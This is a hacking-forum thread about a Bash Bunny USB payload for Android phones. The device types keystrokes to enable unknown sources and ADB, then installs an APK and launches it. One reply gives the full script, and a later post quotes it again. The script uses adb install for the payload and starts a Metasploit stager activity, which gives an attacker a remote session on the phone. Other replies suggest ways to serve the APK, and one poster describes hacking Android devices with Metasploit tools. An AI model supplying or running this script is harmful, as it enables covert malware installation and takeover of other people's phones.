Jump to content
r1ddl3r

Android APK Install

Recommended Posts

Put together a quick and dirty bash bunny script. Allows unknown sources on Android device, grabs apk via webrowser, installs and opens.

https://github.com/JakeBernier/bashbunny/blob/master/android/web_delivery/payload.txt

Also working to get adb delivery method working. Curious if anyone knows of a Android keyboard shortcut that will quickly up settings to speed this up?

Share this post


Link to post
Share on other sites

Cool payload, here's a couple of suggestions.

  1. Put the key commands in a text file under a folder called phones. This will allow someone else to modify the payload for numerous other phones.
    e.g. phones/nexus9_v7.0.txt, phones/galaxys7_v7.0.txt
  2. Use the bash bunny as an ethernet device and pull the payload from a webserver there, so you don't rely on any external infrastructure.

Good stuff!

One more note, you could start and try the adb method in case the phone has USB debugging enabled. If not you can fall back to the key commands. I am working on a similar payload for android, but it doesn't have to do with apk's

Edited by LowValueTarget

Share this post


Link to post
Share on other sites

Awesome suggestions thank you! I'll work on those and update accordingly. 

There is also the option of simply enabling USB debugging which I'm testing out as well. 

Share this post


Link to post
Share on other sites

Not sure if this is what your payload does but what you could do is...

Run a python webserver that serves an .apk, the BB telling the phone to download it (open 172.16.64.1:80 in browser using HID) and install it.

Share this post


Link to post
Share on other sites
I use this a lot myself.
# Enables ADB and unknown sources on a target abdroid
# Then pushes a payload APK via ADB
#
# Requires android-tools-adb installed on the Bash Bunny
#
# Purple ............Running HID emulation, enabling ADB and unknown sources
# Blue Blinking ...............Running ADB command to push payload.apk
# Red Blinking.......android failed to get an IP address from the Bash Bunny
# Green..............Finished
 
LED SETUP
GET TARGET_IP
GET SWITCH_POSITION
 
ATTACKMODE HID
LED ATTACK
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q DOWNARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 500
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 800
Q ENTER
Q DELAY 800
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q ENTER
Q DELAY 200
Q ENTER
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
ATTACKMODE ECM_ETHERNET
LED B 2000
if [ -z "${TARGET_IP}" ]; then
    LED FAIL
exit 1
fi
adb connect ${TARGET_IP}
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
LED FINISH

Share this post


Link to post
Share on other sites

Hi there! Can you please explain only little bit about this technique means what is it and why it is used?or guide me where i can find results about this...Actually i am a new hacker and have less knowledge in hacking android...i can hack android 5 and 4 easily with evil-droid or metasploit or FATRAt...so i need some more knowledge..help..Thank you!

 

Share this post


Link to post
Share on other sites
On 9/24/2018 at 9:34 PM, Shadowharvy said:

I use this a lot myself.
# Enables ADB and unknown sources on a target abdroid
# Then pushes a payload APK via ADB
#
# Requires android-tools-adb installed on the Bash Bunny
#
# Purple ............Running HID emulation, enabling ADB and unknown sources
# Blue Blinking ...............Running ADB command to push payload.apk
# Red Blinking.......android failed to get an IP address from the Bash Bunny
# Green..............Finished
 
LED SETUP
GET TARGET_IP
GET SWITCH_POSITION
 
ATTACKMODE HID
LED ATTACK
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q DOWNARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 500
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 800
Q ENTER
Q DELAY 800
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q ENTER
Q DELAY 200
Q ENTER
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
ATTACKMODE ECM_ETHERNET
LED B 2000
if [ -z "${TARGET_IP}" ]; then
    LED FAIL
exit 1
fi
adb connect ${TARGET_IP}
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
LED FINISH

hello Shadowharvy

im trying to execute a payload with a samsung galaxy s3, i have been working with the payload for android url_open but only can download my apk, im interesting in this part of your code adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk, i think it is more easy for just insert the usb bash bunny and it will search our payload and execute it automaticly.

how can i install this requires ? # Requires android-tools-adb installed on the Bash Bunny

Thanks

  • Upvote 1

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...